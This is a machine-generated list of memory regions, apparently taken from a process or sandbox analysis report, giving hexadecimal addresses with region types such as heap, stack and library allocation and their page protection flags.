2EADA5DE000
heap
page read and write
3005000
heap
page read and write
2EAC1D00000
trusted library section
page read and write
2EAD1DBE000
trusted library allocation
page read and write
6680000
trusted library allocation
page execute and read and write
2DDF000
heap
page read and write
4F4F000
trusted library allocation
page read and write
5570000
trusted library allocation
page read and write
7FFD9989C000
trusted library allocation
page execute and read and write
2D00000
heap
page read and write
2E80000
unkown
page read and write
38E3000
heap
page read and write
58F9000
direct allocation
page read and write
2784000
unkown
page read and write
7230000
heap
page read and write
513E000
stack
page read and write
2FE0000
heap
page read and write
2FD7000
heap
page read and write
400000
unkown
page readonly
7FFD99BD0000
trusted library allocation
page read and write
2F81000
trusted library allocation
page read and write
2250C000
heap
page read and write
2FA1D000
heap
page read and write
38B2000
heap
page read and write
30554FE000
unkown
page readonly
1878371B000
heap
page read and write
30D2000
trusted library allocation
page read and write
1B19000
heap
page read and write
22100000
heap
page read and write
51B000
stack
page read and write
300A000
trusted library allocation
page read and write
305507E000
stack
page read and write
2F7F7000
heap
page read and write
40C000
unkown
page read and write
38B2000
heap
page read and write
7FFD99843000
trusted library allocation
page execute and read and write
335F000
stack
page read and write
2BC0000
trusted library allocation
page read and write
A94000
heap
page read and write
2F711000
heap
page read and write
2EADAC20000
trusted library section
page read and write
6B5B5000
unkown
page readonly
DB0000
unkown
page read and write
2EAE0D00000
trusted library allocation
page read and write
2EADEEF0000
heap
page read and write
2F72F000
heap
page read and write
1040000
trusted library allocation
page read and write
3044000
trusted library allocation
page read and write
25FC000
direct allocation
page read and write
2EADA5E6000
heap
page read and write
3053DF7000
stack
page read and write
2EADEE66000
heap
page read and write
2EAC2130000
trusted library allocation
page read and write
2EADE965000
heap
page read and write
38A6000
heap
page read and write
2784000
unkown
page read and write
2C8D000
trusted library allocation
page execute and read and write
5CE000
stack
page read and write
75E000
unkown
page read and write
2FFF000
heap
page read and write
224D0000
heap
page read and write
7FFD99AD0000
trusted library allocation
page read and write
2C99000
trusted library allocation
page read and write
2784000
unkown
page read and write
2EADEA80000
heap
page read and write
2EAC01F0000
heap
page read and write
3912000
heap
page read and write
1878833E000
trusted library allocation
page read and write
18788398000
trusted library allocation
page read and write
38EA000
heap
page read and write
18783D80000
trusted library allocation
page read and write
2784000
unkown
page read and write
2FA3B000
heap
page read and write
2B2E000
stack
page read and write
C7A000
heap
page read and write
30552FE000
unkown
page readonly
76F000
unkown
page read and write
650000
heap
page read and write
49B8000
heap
page read and write
2ED0000
remote allocation
page read and write
5F0000
heap
page read and write
7C0000
heap
page read and write
2F7ED000
heap
page read and write
2F6AD000
heap
page read and write
2D60000
heap
page read and write
530000
heap
page read and write
38B9000
heap
page read and write
4F3E000
trusted library allocation
page read and write
2F743000
heap
page read and write
2FA04000
heap
page read and write
560000
heap
page read and write
4F2D000
trusted library allocation
page read and write
22578000
heap
page read and write
224F0000
heap
page read and write
25D8000
direct allocation
page read and write
A94000
heap
page read and write
2784000
unkown
page read and write
7FFD99ACC000
trusted library allocation
page read and write
3054DFE000
unkown
page readonly
B46000
heap
page read and write
187882B5000
trusted library allocation
page read and write
6F90000
trusted library allocation
page execute and read and write
18783E80000
trusted library section
page readonly
2EAC1C80000
trusted library allocation
page read and write
2EADA84A000
heap
page read and write
38A4000
heap
page read and write
18782E78000
heap
page read and write
2C4D000
stack
page read and write
1878831C000
trusted library allocation
page read and write
FD91E3E000
stack
page read and write
2F9E1000
heap
page read and write
224EC000
heap
page read and write
2EAC0140000
heap
page read and write
6B3BE000
unkown
page read and write
239A000
stack
page read and write
82EE000
stack
page read and write
DBC000
unkown
page read and write
26B1000
direct allocation
page read and write
3054D7E000
stack
page read and write
7FFD99D30000
trusted library allocation
page read and write
524E000
unkown
page read and write
3054A7E000
stack
page read and write
774000
unkown
page read and write
2F6DA000
heap
page read and write
4B1E000
stack
page read and write
3912000
heap
page read and write
746C000
stack
page read and write
12CC000
stack
page read and write
47B6000
heap
page read and write
1B3C000
heap
page read and write
18788650000
remote allocation
page read and write
18783615000
heap
page read and write
1878844F000
heap
page read and write
6320000
trusted library allocation
page execute and read and write
3054AFE000
unkown
page readonly
52F9000
heap
page read and write
580000
heap
page read and write
1BFE000
heap
page read and write
FE4000
trusted library allocation
page read and write
7F4000
heap
page read and write
597C000
stack
page read and write
7FF477490000
trusted library allocation
page execute and read and write
2F9D2000
heap
page read and write
38C6000
heap
page read and write
4BD5000
heap
page read and write
2A3B000
unkown
page read and write
4F56000
trusted library allocation
page read and write
2EAC0150000
heap
page read and write
1A91000
heap
page read and write
A94000
heap
page read and write
CB0000
heap
page read and write
50FF000
stack
page read and write
2EAC01EE000
heap
page read and write
6C789000
unkown
page write copy
225D1000
heap
page read and write
2920000
unkown
page read and write
1BC2E000
stack
page read and write
FD90EFE000
stack
page read and write
453C000
heap
page read and write
38E9000
heap
page read and write
1BE7D000
stack
page read and write
7500000
trusted library allocation
page read and write
596E000
direct allocation
page read and write
1878852D000
heap
page read and write
7F4000
heap
page read and write
3700000
heap
page read and write
3912000
heap
page read and write
2784000
unkown
page read and write
423E000
trusted library allocation
page read and write
2FF7000
heap
page read and write
7F4000
heap
page read and write
4B0000
heap
page read and write
C8E000
heap
page read and write
2C70000
trusted library allocation
page read and write
433B000
unkown
page read and write
2596000
direct allocation
page read and write
2C8D000
unkown
page read and write
74F0000
trusted library allocation
page read and write
7FFD99C20000
trusted library allocation
page read and write
33A0000
heap
page read and write
7FFD99A3A000
trusted library allocation
page read and write
525E000
trusted library allocation
page read and write
224FE000
heap
page read and write
1878375C000
heap
page read and write
2EADA607000
heap
page read and write
2EADEF25000
heap
page read and write
2EADEE85000
heap
page read and write
10B7000
heap
page read and write
C24000
heap
page read and write
2784000
unkown
page read and write
10D0000
heap
page read and write
74C0000
trusted library allocation
page read and write
3225000
heap
page read and write
DBA000
unkown
page read and write
2E21000
trusted library allocation
page read and write
62F0000
trusted library allocation
page read and write
38D3000
heap
page read and write
30544FE000
unkown
page readonly
1BBDF000
stack
page read and write
3860000
heap
page read and write
1037000
heap
page read and write
3550000
heap
page read and write
8090000
trusted library allocation
page read and write
4F0D000
stack
page read and write
3717000
heap
page read and write
224F0000
heap
page read and write
64D000
heap
page read and write
222D0000
heap
page read and write
4988000
trusted library allocation
page read and write
1C5000
heap
page read and write
38B9000
heap
page read and write
18788505000
heap
page read and write
9DE000
stack
page read and write
C21000
heap
page read and write
7FF477473000
trusted library allocation
page execute read
2F71B000
heap
page read and write
2EADA0C2000
heap
page read and write
38B2000
heap
page read and write
2C46000
heap
page read and write
18783E60000
trusted library section
page readonly
2250C000
heap
page read and write
25C5000
direct allocation
page read and write
850000
heap
page read and write
2FED000
heap
page read and write
38B8000
heap
page read and write
7FFD99C60000
trusted library allocation
page read and write
6C2A1000
unkown
page execute read
5B71000
trusted library allocation
page read and write
7A8E000
stack
page read and write
191000
stack
page read and write
2F5A000
trusted library allocation
page read and write
2FE1000
trusted library allocation
page read and write
224F1000
heap
page read and write
8F8000
stack
page read and write
2636000
direct allocation
page read and write
61E01000
direct allocation
page execute read
580000
heap
page read and write
711E000
stack
page read and write
5F8000
heap
page read and write
2784000
unkown
page read and write
303D000
trusted library allocation
page read and write
4450000
unkown
page read and write
74BD000
stack
page read and write
2F671000
heap
page read and write
2BEE000
stack
page read and write
2F9E6000
heap
page read and write
448000
unkown
page execute and read and write
27B0000
heap
page read and write
A94000
heap
page read and write
10BE000
stack
page read and write
187882F0000
trusted library allocation
page read and write
3054E7E000
stack
page read and write
2F7E3000
heap
page read and write
523E000
stack
page read and write
1E0000
heap
page read and write
3054EFE000
unkown
page readonly
2EADB520000
heap
page execute and read and write
4F3A000
trusted library allocation
page read and write
D4C000
unkown
page readonly
2E63000
trusted library allocation
page read and write
49E000
stack
page read and write
C81000
heap
page read and write
1C040000
heap
page read and write
B70000
heap
page read and write
2784000
unkown
page read and write
18788461000
heap
page read and write
3734000
unkown
page read and write
5CC000
heap
page read and write
7FFD99C00000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
2FA68000
heap
page read and write
2D2C000
stack
page read and write
224ED000
heap
page read and write
2EADB142000
trusted library allocation
page read and write
400000
unkown
page readonly
370E000
stack
page read and write
2D48000
trusted library allocation
page read and write
7FF47748F000
trusted library allocation
page execute read
EFC000
heap
page read and write
2700000
trusted library allocation
page read and write
BA1000
unkown
page execute read
2662000
direct allocation
page read and write
3054F7E000
stack
page read and write
2FA40000
heap
page read and write
26A3000
direct allocation
page read and write
7FF477489000
trusted library allocation
page execute read
7FFD99A90000
trusted library allocation
page read and write
18783EA0000
trusted library section
page readonly
408000
unkown
page readonly
7FFD99B40000
trusted library allocation
page read and write
3762000
heap
page read and write
100B000
trusted library allocation
page execute and read and write
18788530000
heap
page read and write
6B330000
unkown
page readonly
FD914FE000
stack
page read and write
113F000
heap
page read and write
1045000
trusted library allocation
page execute and read and write
6CBB000
stack
page read and write
2590000
direct allocation
page read and write
269C000
direct allocation
page read and write
38DA000
heap
page read and write
6420000
trusted library allocation
page read and write
A94000
heap
page read and write
2E550000
trusted library allocation
page read and write
7520000
trusted library allocation
page read and write
25BE000
direct allocation
page read and write
18788650000
remote allocation
page read and write
7FFD99A56000
trusted library allocation
page read and write
C86000
heap
page read and write
38BF000
heap
page read and write
19F9000
unkown
page readonly
6D40000
heap
page read and write
5980000
trusted library allocation
page read and write
3912000
heap
page read and write
52BB000
trusted library allocation
page read and write
262F000
direct allocation
page read and write
1A20000
heap
page read and write
2E4B000
trusted library allocation
page read and write
6FDE000
stack
page read and write
2EADEE6A000
heap
page read and write
23E0000
direct allocation
page read and write
3053A7C000
stack
page read and write
7FFD99926000
trusted library allocation
page execute and read and write
8080000
trusted library allocation
page read and write
3019000
trusted library allocation
page read and write
8050000
heap
page read and write
222A6000
heap
page read and write
18783600000
heap
page read and write
2FFC000
heap
page read and write
7FFD99AB4000
trusted library allocation
page read and write
1B25000
heap
page read and write
6CFE000
stack
page read and write
2F92D000
heap
page read and write
2F1C000
trusted library allocation
page read and write
527D000
trusted library allocation
page read and write
614000
heap
page read and write
2FCC000
trusted library allocation
page read and write
2EAC1C60000
heap
page read and write
A0E000
stack
page read and write
7190000
trusted library allocation
page read and write
187882E0000
trusted library allocation
page read and write
2E67000
trusted library allocation
page read and write
18788420000
heap
page read and write
6C404000
unkown
page read and write
2EADA5E0000
heap
page read and write
2784000
unkown
page read and write
7C8E000
stack
page read and write
82AE000
stack
page read and write
3F80000
trusted library allocation
page read and write
4DCD000
direct allocation
page read and write
2EAC0195000
heap
page read and write
18788650000
remote allocation
page read and write
3690000
heap
page read and write
2EAC1CF0000
trusted library section
page read and write
FF0000
trusted library allocation
page read and write
2784000
unkown
page read and write
18782EFF000
heap
page read and write
9E5000
heap
page read and write
268E000
stack
page read and write
2F0E000
stack
page read and write
224D5000
heap
page read and write
38C0000
heap
page read and write
599F000
trusted library allocation
page read and write
38DA000
heap
page read and write
38D1000
heap
page read and write
295C000
unkown
page read and write
61ECC000
direct allocation
page read and write
BA0000
unkown
page readonly
2ECD000
trusted library allocation
page read and write
2F784000
heap
page read and write
4DC9000
direct allocation
page read and write
2BB0000
trusted library allocation
page read and write
10D8000
heap
page read and write
49AA000
heap
page read and write
2C90000
trusted library allocation
page read and write
549000
unkown
page execute and read and write
1000000
trusted library allocation
page read and write
7FFD99A0E000
trusted library allocation
page read and write
2EADA820000
heap
page read and write
9A000
stack
page read and write
DC3000
unkown
page readonly
2784000
unkown
page read and write
417000
unkown
page execute read
187882FD000
trusted library allocation
page read and write
440C000
stack
page read and write
6341000
trusted library allocation
page read and write
2EADA5B4000
heap
page read and write
2F6A8000
heap
page read and write
38CF000
heap
page read and write
18782E94000
heap
page read and write
3837000
heap
page read and write
38C3000
heap
page read and write
3A51000
heap
page read and write
D1F000
stack
page read and write
84E000
stack
page read and write
4A3E000
stack
page read and write
2C80000
trusted library allocation
page read and write
614000
heap
page read and write
76A000
unkown
page read and write
7FFD99BBF000
trusted library allocation
page read and write
2619000
direct allocation
page read and write
3869000
heap
page read and write
C28000
heap
page read and write
75AD000
stack
page read and write
9E0000
heap
page read and write
2654000
direct allocation
page read and write
2F676000
heap
page read and write
3D71000
trusted library allocation
page read and write
2EADEAC5000
heap
page read and write
38C3000
heap
page read and write
2FF0000
unkown
page readonly
2669000
direct allocation
page read and write
2B6E000
stack
page read and write
187882C8000
trusted library allocation
page read and write
6B331000
unkown
page execute read
23D0000
unkown
page read and write
1AF7000
heap
page read and write
7510000
trusted library allocation
page read and write
224EC000
heap
page read and write
2F770000
heap
page read and write
6D03000
heap
page read and write
2F9AA000
heap
page read and write
40A000
unkown
page read and write
7FFD99D40000
trusted library allocation
page read and write
2FE9000
heap
page read and write
263E000
direct allocation
page read and write
22188000
heap
page read and write
3912000
heap
page read and write
E90000
heap
page read and write
2EADEB10000
trusted library allocation
page read and write
4B5000
heap
page read and write
23A0000
unkown
page readonly
2EAE0AF0000
trusted library allocation
page read and write
2784000
unkown
page read and write
DBC000
unkown
page read and write
2F69E000
heap
page read and write
6B5AF000
unkown
page write copy
277F000
stack
page read and write
B1F000
stack
page read and write
1878371A000
heap
page read and write
2EADA5C0000
heap
page read and write
2FE0000
unkown
page readonly
650000
heap
page read and write
224F8000
heap
page read and write
E50000
heap
page read and write
2F707000
heap
page read and write
2EADA85B000
heap
page read and write
7FFD9984D000
trusted library allocation
page execute and read and write
187882D0000
trusted library allocation
page read and write
800D000
stack
page read and write
2784000
unkown
page read and write
3912000
heap
page read and write
38D2000
heap
page read and write
1878850A000
heap
page read and write
18782EB4000
heap
page read and write
18788230000
trusted library allocation
page read and write
2D39000
trusted library allocation
page read and write
C66000
heap
page read and write
2F6D5000
heap
page read and write
4FDC000
heap
page read and write
2EADEEC4000
heap
page read and write
224E7000
heap
page read and write
7FFD99A70000
trusted library allocation
page read and write
224EB000
heap
page read and write
2BE0000
heap
page read and write
2250D000
heap
page read and write
3720000
heap
page read and write
38C5000
heap
page read and write
58BB000
stack
page read and write
2EABC7C2000
unkown
page readonly
222A2000
heap
page read and write
A4E000
stack
page read and write
2F70C000
heap
page read and write
FD92778000
stack
page read and write
6C630000
unkown
page readonly
7FFD99B20000
trusted library allocation
page read and write
4F1D000
trusted library allocation
page read and write
3009000
heap
page read and write
4BF0000
heap
page read and write
2D98000
heap
page read and write
2784000
unkown
page read and write
2B86000
heap
page read and write
22501000
heap
page read and write
2EADEECB000
heap
page read and write
22F0000
heap
page read and write
E60000
heap
page read and write
3159000
trusted library allocation
page read and write
94F000
stack
page read and write
98E000
stack
page read and write
2ED0000
trusted library allocation
page read and write
22504000
heap
page read and write
2EADA55D000
heap
page read and write
22505000
heap
page read and write
C32000
heap
page read and write
224EE000
heap
page read and write
BA0000
unkown
page readonly
3854000
heap
page read and write
4533000
unkown
page read and write
E80000
heap
page read and write
18783460000
trusted library allocation
page read and write
2F0DA000
heap
page read and write
2F914000
heap
page read and write
7FFD99C40000
trusted library allocation
page read and write
7FFD998F0000
trusted library allocation
page read and write
2EADA610000
heap
page read and write
3718000
heap
page read and write
2EADA867000
heap
page read and write
2EADA780000
trusted library section
page read and write
3912000
heap
page read and write
2F757000
heap
page read and write
3134000
trusted library allocation
page read and write
7FFD99D20000
trusted library allocation
page read and write
2B4F000
unkown
page read and write
2EADE958000
heap
page read and write
22188000
heap
page read and write
7FFD99853000
trusted library allocation
page read and write
4ACF000
stack
page read and write
60D000
heap
page read and write
187882BB000
trusted library allocation
page read and write
2EAC1BD0000
heap
page read and write
38E3000
heap
page read and write
3690000
heap
page read and write
3053FFE000
stack
page read and write
743F000
stack
page read and write
38D9000
heap
page read and write
2EAE09E0000
trusted library allocation
page read and write
2CF0000
heap
page readonly
2F7A2000
heap
page read and write
2D09000
heap
page read and write
D20000
trusted library allocation
page read and write
1C7000
heap
page read and write
22131000
heap
page read and write
30DC000
trusted library allocation
page read and write
2EADA852000
heap
page read and write
C73000
heap
page read and write
1C041000
heap
page read and write
C5B000
heap
page read and write
1022000
trusted library allocation
page read and write
38B8000
heap
page read and write
2F0E000
trusted library allocation
page read and write
C9F000
heap
page read and write
2FA7000
trusted library allocation
page read and write
49FC000
stack
page read and write
2250D000
heap
page read and write
C8A000
heap
page read and write
2EAE09D0000
trusted library allocation
page read and write
2784000
unkown
page read and write
38E9000
heap
page read and write
38C5000
heap
page read and write
187882B0000
trusted library allocation
page read and write
2EAC0380000
heap
page read and write
2F720000
heap
page read and write
33AE000
unkown
page read and write
187883AF000
trusted library allocation
page read and write
224F0000
heap
page read and write
C40000
heap
page read and write
2EADA591000
heap
page read and write
2FF2000
heap
page read and write
1AA8000
heap
page read and write
18788372000
trusted library allocation
page read and write
382F000
stack
page read and write
2784000
unkown
page read and write
C3A000
heap
page read and write
79BF000
stack
page read and write
2CB5000
trusted library allocation
page execute and read and write
18788341000
trusted library allocation
page read and write
2784000
unkown
page read and write
2D50000
trusted library allocation
page execute and read and write
C61000
heap
page read and write
224FE000
heap
page read and write
38B8000
heap
page read and write
30F5000
trusted library allocation
page read and write
88B000
heap
page read and write
528E000
stack
page read and write
2FEA000
heap
page read and write
19D000
stack
page read and write
2EAC0291000
heap
page read and write
38D7000
heap
page read and write
18788390000
trusted library allocation
page read and write
18783570000
trusted library section
page read and write
6F70000
heap
page read and write
1BF0000
heap
page read and write
2F84000
unkown
page read and write
7FF477471000
trusted library allocation
page execute read
2E35000
trusted library allocation
page read and write
526E000
trusted library allocation
page read and write
2D7E000
stack
page read and write
224E3000
heap
page read and write
5CC000
heap
page read and write
2F928000
heap
page read and write
2F6CB000
heap
page read and write
3600000
direct allocation
page read and write
712A000
stack
page read and write
2686000
direct allocation
page read and write
2784000
unkown
page read and write
31EF000
trusted library allocation
page read and write
224FF000
heap
page read and write
FBE000
stack
page read and write
23C0000
heap
page read and write
2EADA5DA000
heap
page read and write
224EC000
heap
page read and write
40A0000
trusted library allocation
page read and write
2621000
direct allocation
page read and write
2FEE000
heap
page read and write
2FD0000
heap
page read and write
18783E70000
trusted library section
page readonly
30DF000
trusted library allocation
page read and write
3B5F000
heap
page read and write
7FF477470000
trusted library allocation
page readonly
DC3000
unkown
page readonly
54CF000
stack
page read and write
2784000
unkown
page read and write
371B000
heap
page read and write
7FFD99844000
trusted library allocation
page read and write
7710000
heap
page read and write
1878836A000
trusted library allocation
page read and write
79C0000
heap
page read and write
2790000
heap
page read and write
2E59000
trusted library allocation
page read and write
22500000
heap
page read and write
2330000
heap
page read and write
722F000
heap
page read and write
38C6000
heap
page read and write
2784000
unkown
page read and write
2FA36000
heap
page read and write
3167000
trusted library allocation
page read and write
258D000
direct allocation
page read and write
7FFD99DB0000
trusted library allocation
page read and write
6DBA000
stack
page read and write
18788380000
trusted library allocation
page read and write
288F000
unkown
page read and write
FD91DFB000
stack
page read and write
311E000
stack
page read and write
224EA000
heap
page read and write
30549FE000
unkown
page readonly
2ED0000
remote allocation
page read and write
7FFD99CF0000
trusted library allocation
page execute and read and write
2FEF000
heap
page read and write
7F4000
heap
page read and write
E70000
heap
page read and write
18782E2B000
heap
page read and write
401000
unkown
page execute read
18782CD0000
heap
page read and write
DB0000
unkown
page read and write
2EADE9CA000
heap
page read and write
7FF477485000
trusted library allocation
page execute read
1B31000
heap
page read and write
270C000
stack
page read and write
2F9FF000
heap
page read and write
FD90B9B000
stack
page read and write
4ACE000
stack
page read and write
2BEF000
stack
page read and write
187882BE000
trusted library allocation
page read and write
9B000
stack
page read and write
302F000
trusted library allocation
page read and write
59A5000
trusted library allocation
page read and write
2EAC2180000
trusted library allocation
page read and write
7FFD99D90000
trusted library allocation
page execute and read and write
2EADEE3A000
heap
page read and write
5F3000
heap
page read and write
2F6D0000
heap
page read and write
5B81000
unkown
page read and write
1B90000
heap
page read and write
187882B1000
trusted library allocation
page read and write
A94000
heap
page read and write
663E000
stack
page read and write
18788537000
heap
page read and write
18788610000
trusted library allocation
page read and write
3360000
unkown
page read and write
2784000
unkown
page read and write
1280000
heap
page read and write
3234000
heap
page read and write
22AE000
stack
page read and write
2E00000
heap
page read and write
3092000
trusted library allocation
page read and write
1A1B000
unkown
page read and write
FD90FFE000
stack
page read and write
7FFD99D70000
trusted library allocation
page read and write
2784000
unkown
page read and write
220F0000
heap
page read and write
441000
unkown
page read and write
2734000
trusted library allocation
page read and write
265B000
direct allocation
page read and write
18782E00000
heap
page read and write
38CC000
heap
page read and write
18783B40000
trusted library allocation
page read and write
2EADEED7000
heap
page read and write
7FFD9985D000
trusted library allocation
page execute and read and write
38CD000
heap
page read and write
3858000
heap
page read and write
3220000
heap
page read and write
5051000
unkown
page read and write
2F60000
heap
page read and write
2D30000
trusted library allocation
page read and write
2784000
unkown
page read and write
C70000
heap
page read and write
3A51000
heap
page read and write
71E2000
heap
page read and write
3055E7E000
stack
page read and write
1E5000
heap
page read and write
30EA000
trusted library allocation
page read and write
C2C000
heap
page read and write
2726000
trusted library allocation
page read and write
2EADA54B000
heap
page read and write
3762000
heap
page read and write
30542FE000
unkown
page readonly
75A0000
trusted library allocation
page read and write
3831000
heap
page read and write
7FFD99BB7000
trusted library allocation
page read and write
2784000
unkown
page read and write
273E000
trusted library allocation
page read and write
18783713000
heap
page read and write
1BFCE000
stack
page read and write
30541F9000
stack
page read and write
7FF47748C000
trusted library allocation
page readonly
224F0000
heap
page read and write
7FFD99A37000
trusted library allocation
page read and write
2785000
unkown
page read and write
38EE000
heap
page read and write
18782E7D000
heap
page read and write
3821000
heap
page read and write
5C0000
heap
page read and write
2770000
trusted library allocation
page read and write
59AA000
trusted library allocation
page read and write
5060000
unkown
page read and write
2EAC20A4000
trusted library allocation
page read and write
2F68A000
heap
page read and write
3839000
heap
page read and write
18788380000
trusted library allocation
page read and write
2784000
unkown
page read and write
22174000
heap
page read and write
2FF5000
heap
page read and write
30556FE000
unkown
page readonly
371B000
heap
page read and write
49B0000
heap
page read and write
FD918F4000
stack
page read and write
71D2000
heap
page read and write
FD917F1000
stack
page read and write
26D0000
trusted library allocation
page execute and read and write
2EABD1FB000
unkown
page readonly
2250D000
heap
page read and write
1C4E000
stack
page read and write
6F40000
trusted library section
page read and write
2EADE944000
heap
page read and write
2EADA5F2000
heap
page read and write
720A000
heap
page read and write
7FFD99B18000
trusted library allocation
page read and write
2E4D000
heap
page read and write
2F90F000
heap
page read and write
5276000
trusted library allocation
page read and write
33C4000
unkown
page read and write
38C3000
heap
page read and write
6F9E000
stack
page read and write
C34000
heap
page read and write
7228000
heap
page read and write
3730000
unkown
page read and write
1026000
trusted library allocation
page execute and read and write
38D7000
heap
page read and write
307F000
trusted library allocation
page read and write
2784000
unkown
page read and write
7FFD99A40000
trusted library allocation
page read and write
2EAC20B1000
trusted library allocation
page read and write
31C5000
trusted library allocation
page read and write
2FF2000
heap
page read and write
40AD000
trusted library allocation
page read and write
2FAA000
stack
page read and write
DB9000
unkown
page write copy
1BD2E000
stack
page read and write
4CC6000
trusted library allocation
page read and write
783000
unkown
page readonly
319A000
trusted library allocation
page read and write
2250C000
heap
page read and write
38B1000
heap
page read and write
42CC000
stack
page read and write
7FFD99900000
trusted library allocation
page execute and read and write
1060000
trusted library allocation
page read and write
6350000
trusted library allocation
page execute and read and write
52A6000
trusted library allocation
page read and write
22120000
heap
page read and write
8B0000
heap
page read and write
224E0000
heap
page read and write
7FF47748D000
trusted library allocation
page execute read
305497E000
stack
page read and write
38B2000
heap
page read and write
3E96000
trusted library allocation
page read and write
3001000
heap
page read and write
BA1000
unkown
page execute read
18788322000
trusted library allocation
page read and write
2FE7000
heap
page read and write
7F4000
heap
page read and write
25EB000
direct allocation
page read and write
5410000
heap
page read and write
7FFD99D56000
trusted library allocation
page read and write
2D68000
heap
page read and write
7FFD99B30000
trusted library allocation
page read and write
18784220000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
5400000
trusted library allocation
page read and write
4F1A000
trusted library allocation
page read and write
2F6DF000
heap
page read and write
18788395000
trusted library allocation
page read and write
4B60000
heap
page execute and read and write
2F6C6000
heap
page read and write
3915000
heap
page read and write
FD916FB000
stack
page read and write
38E3000
heap
page read and write
5BE000
heap
page read and write
30A0000
trusted library allocation
page read and write
324D000
heap
page read and write
2840000
heap
page read and write
C6C000
heap
page read and write
187882A0000
trusted library allocation
page read and write
6B3C2000
unkown
page readonly
41E000
unkown
page read and write
11C9000
heap
page read and write
40A9000
trusted library allocation
page read and write
1C041000
heap
page read and write
A00000
heap
page read and write
18788870000
trusted library allocation
page read and write
2DAF000
stack
page read and write
2EAD1DA4000
trusted library allocation
page read and write
58FD000
direct allocation
page read and write
2EAC1CD0000
trusted library section
page read and write
187883CA000
trusted library allocation
page read and write
197000
stack
page read and write
2D2F000
stack
page read and write
7FFD99A14000
trusted library allocation
page read and write
1C140000
trusted library allocation
page read and write
2780000
trusted library allocation
page read and write
2FA22000
heap
page read and write
2784000
unkown
page read and write
2EADEABD000
heap
page read and write
3912000
heap
page read and write
6B5AE000
unkown
page read and write
7FFD99A10000
trusted library allocation
page read and write
30547FB000
stack
page read and write
6B56F000
unkown
page readonly
FD9217D000
stack
page read and write
1C44000
heap
page read and write
2D8C000
heap
page read and write
18788220000
trusted library allocation
page read and write
2EAC0530000
heap
page read and write
2F789000
heap
page read and write
59AF000
trusted library allocation
page read and write
3053EFE000
unkown
page readonly
30557FB000
stack
page read and write
2FA5E000
heap
page read and write
3912000
heap
page read and write
7FF477483000
trusted library allocation
page execute read
2F35000
trusted library allocation
page read and write
358E000
stack
page read and write
38E6000
heap
page read and write
18788600000
trusted library allocation
page read and write
419000
unkown
page write copy
33C4000
unkown
page read and write
7FFD99C17000
trusted library allocation
page read and write
5250000
trusted library allocation
page read and write
2F9A0000
heap
page read and write
6F1E000
stack
page read and write
224EB000
heap
page read and write
38CD000
heap
page read and write
224FE000
heap
page read and write
2FFD000
heap
page read and write
71B0000
heap
page read and write
7FFD99D50000
trusted library allocation
page read and write
2F6FD000
heap
page read and write
18788442000
heap
page read and write
3726000
heap
page read and write
1878852E000
heap
page read and write
2FF8000
heap
page read and write
3EEE000
stack
page read and write
3865000
heap
page read and write
E90000
heap
page read and write
1878371B000
heap
page read and write
7F4000
heap
page read and write
6B5B0000
unkown
page read and write
2D50000
trusted library allocation
page read and write
4AD5000
heap
page execute and read and write
A8F000
heap
page read and write
38CD000
heap
page read and write
2580000
direct allocation
page read and write
3912000
heap
page read and write
18782E5B000
heap
page read and write
3146000
trusted library allocation
page read and write
2EAE0A70000
trusted library allocation
page read and write
DB9000
unkown
page write copy
AA0000
heap
page read and write
D4C000
unkown
page readonly
2FFF000
heap
page read and write
2250C000
heap
page read and write
E40000
heap
page read and write
2F65000
trusted library allocation
page read and write
60D000
heap
page read and write
7FFD9986B000
trusted library allocation
page execute and read and write
7FF477486000
trusted library allocation
page readonly
4DDE000
stack
page read and write
BE0000
heap
page read and write
187882B8000
trusted library allocation
page read and write
6C797000
unkown
page readonly
6B3D0000
unkown
page readonly
222AC000
heap
page read and write
4BD2000
trusted library allocation
page read and write
FD910FE000
stack
page read and write
2710000
heap
page read and write
2EAC1CC0000
trusted library section
page read and write
3103000
trusted library allocation
page read and write
1878852E000
heap
page read and write
7FFD99C30000
trusted library allocation
page read and write
30548FE000
unkown
page readonly
2EADEF3C000
heap
page read and write
C35000
heap
page read and write
30551FB000
stack
page read and write
2250D000
heap
page read and write
2FFF000
heap
page read and write
52B0000
trusted library allocation
page read and write
2229A000
heap
page read and write
2FE5000
heap
page read and write
1047000
trusted library allocation
page execute and read and write
2F7DE000
heap
page read and write
5070000
unkown
page read and write
3CB0000
heap
page read and write
7FFD998FC000
trusted library allocation
page execute and read and write
31A9000
trusted library allocation
page read and write
52C5000
trusted library allocation
page read and write
224D7000
heap
page read and write
2784000
unkown
page read and write
30553FB000
stack
page read and write
30A7000
trusted library allocation
page read and write
2E76000
trusted library allocation
page read and write
6CDE000
stack
page read and write
276B000
trusted library allocation
page read and write
10C0000
trusted library allocation
page execute and read and write
53CD000
stack
page read and write
187882B0000
trusted library allocation
page read and write
455A000
unkown
page read and write
371B000
heap
page read and write
1004000
trusted library allocation
page read and write
1878842D000
heap
page read and write
2EADB124000
trusted library allocation
page read and write
605000
heap
page read and write
55E0000
trusted library allocation
page read and write
5F8000
heap
page read and write
7FFD99D80000
trusted library allocation
page read and write
2594000
direct allocation
page read and write
7FFD99DA0000
trusted library allocation
page execute and read and write
10FB000
heap
page read and write
DBA000
unkown
page read and write
7FF477487000
trusted library allocation
page execute read
38EB000
heap
page read and write
28A5000
unkown
page read and write
3463000
heap
page read and write
3087000
trusted library allocation
page read and write
411E000
stack
page read and write
310B000
trusted library allocation
page read and write
61ED4000
direct allocation
page readonly
2EAC1C90000
trusted library section
page read and write
3208000
trusted library allocation
page read and write
E94000
heap
page read and write
7FFD99A32000
trusted library allocation
page read and write
2F7F2000
heap
page read and write
2716000
heap
page read and write
1A40000
heap
page read and write
40A000
unkown
page write copy
FD913FD000
stack
page read and write
2EAC021F000
heap
page read and write
2F7C0000
heap
page read and write
2F7BB000
heap
page read and write
A0D000
stack
page read and write
64D000
heap
page read and write
224D6000
heap
page read and write
2EADEB30000
trusted library section
page readonly
2CAE000
stack
page read and write
2E7D000
stack
page read and write
2F9DC000
heap
page read and write
580000
heap
page read and write
7FFD999E2000
trusted library allocation
page read and write
445000
unkown
page readonly
4FBB000
heap
page read and write
224D7000
heap
page read and write
22505000
heap
page read and write
3E75000
trusted library allocation
page read and write
761000
unkown
page read and write
4D90000
trusted library allocation
page read and write
18788600000
trusted library allocation
page read and write
2F6B7000
heap
page read and write
653F000
stack
page read and write
359F000
unkown
page read and write
224FB000
heap
page read and write
3859000
heap
page read and write
416000
unkown
page read and write
2FF2000
heap
page read and write
1C7000
heap
page read and write
2F6F3000
heap
page read and write
2A10000
heap
